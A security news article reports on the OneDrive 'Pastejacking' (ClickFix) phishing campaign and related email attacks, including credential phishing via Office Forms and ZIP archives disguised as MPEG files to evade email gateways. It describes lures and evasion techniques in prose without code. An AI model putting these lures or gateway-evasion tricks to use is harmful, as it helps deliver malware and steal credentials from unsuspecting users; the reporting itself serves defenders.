OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script
Cybersecurity researchers are warning about a new phishing campaign that targets Microsoft OneDrive users with the aim of executing a malicious PowerShell script.
“This campaign heavily relies on social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems,” Trellix security researcher Rafael Pena said in a Monday analysis.
The cybersecurity company is tracking the “crafty” phishing and downloader campaign under the name OneDrive Pastejacking.
The attack unfolds via an email containing an HTML file that, when opened, displays an image simulating a OneDrive page and displays an error message that says: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.”
The message also comes with two options, namely “How to fix” and “Details,” with the latter directing the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS.
However, clicking “How to fix” prompts the user to follow a series of steps, which includes pressing “Windows Key + X” to open the Quick Link menu, launching the PowerShell terminal, and pasting a Base64-encoded command to supposedly fix the issue.
“The command […] first runs ipconfig /flushdns, then creates a folder on the C: drive named ‘downloads,'” Pena explained. “Subsequently, it downloads an archive file into this location, renames it, extracts its contents (‘script.a3x’ and ‘AutoIt3.exe’), and executes script.a3x using AutoIt3.exe.”
The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent.
The development comes amid the discovery of a new email-based social engineering campaign distributing bogus Windows shortcut files that lead to the execution of malicious payloads hosted on Discord’s Content Delivery Network (CDN) infrastructure.
Phishing campaigns have also been increasingly observed, such as sending Microsoft Office Forms from previously compromised legitimate email accounts to entice targets into divulging their Microsoft 365 login credentials by clicking on a seemingly innocuous link.
“Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within the forms,” Perception Point said. “These forms are then sent to targets en-masse via email under the guise of legitimate requests such as changing passwords or accessing important documents, mimicking trusted platforms and brands like Adobe or Microsoft SharePoint document viewer.”
What’s more, other attack waves have utilized invoice-themed lures to trick victims to sharing their credentials on phishing pages hosted on Cloudflare R2 that are then exfiltrated to the threat actor via a Telegram bot.
It’s no surprise that adversaries are constantly on the lookout for different ways to stealthily smuggle malware past Secure Email Gateways (SEGs) so as to increase the likelihood of success of their attacks.
According to a recent report from Cofense, bad actors are abusing how SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader (aka ModiLoader and NatsoLoader).
Specifically, this involves passing off the HTML payload as an MPEG file to evade detection by taking advantage of the fact that many common archive extractors and SEGs parse the file header information but ignore the file footer that may contain more accurate information about the file format.
“The threat actors utilized a .ZIP archive attachment and when the SEG scanned the file contents, the archive was detected as containing a .MPEG video file and was not blocked or filtered,” the company noted.
“When this attachment was opened with common/popular archive extraction tools such as 7-Zip or Power ISO, it also appeared to contain a .MPEG video file, but it would not play. However, when the archive was opened in an Outlook client or via the Windows Explorer archive manager, the .MPEG file is (correctly) detected as being a .HTML [file].”